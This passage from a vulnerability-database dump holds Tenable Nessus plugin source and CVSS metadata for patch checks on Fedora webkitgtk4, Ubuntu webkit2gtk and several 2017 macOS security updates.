audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.18.4-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-14T14:34:36", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-04T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.04 / 17.10 : webkit2gtk vulnerabilities (USN-3514-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3514-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105544", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3514-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105544);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\");\n script_xref(name:\"USN\", value:\"3514-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.04 / 17.10 : webkit2gtk vulnerabilities (USN-3514-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3514-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.4-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.4-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.4-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.4-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.4-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.4-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:58", "description": "The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is missing a security update. It is therefore, affected by multiple vulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-12837", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13872", "CVE-2017-13904", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-7154", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOSX_SECUPD2017-005.NASL", "href": "https://www.tenable.com/plugins/nessus/105081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105081);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-3735\",\n \"CVE-2017-7154\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\",\n \"CVE-2017-12837\",\n \"CVE-2017-13847\",\n \"CVE-2017-13855\",\n \"CVE-2017-13862\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13872\",\n \"CVE-2017-13904\",\n \"CVE-2017-15422\",\n \"CVE-2017-1000254\"\n );\n script_bugtraq_id(\n 100515,\n 100860,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102100,\n 103134,\n 103135\n );\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002 / 2017-005.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that\nfixes multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-005 or later for 10.11.x or\nSecurity Update 2017-002 or later for 10.12.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11\\.6|12\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.11.6 or Mac OS X 10.12.6\");\n\nif (\"10.11.6\" >< os)\n patch = \"2017-005\";\nelse\n patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-30T14:47:27", "description": "The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:39:50", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4088), [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13885), [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7165), [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13884), [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7160), [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7153), [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7161), [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-02-05T00:00:00", "type": "nessus", "title": "Fedora 26 : webkitgtk4 (2018-43712163de)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-43712163DE.NASL", "href": "https://www.tenable.com/plugins/nessus/106594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-43712163de.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106594);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"FEDORA\", value:\"2018-43712163de\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2018-43712163de)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4088),\n [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13885),\n [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7165),\n [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c\n 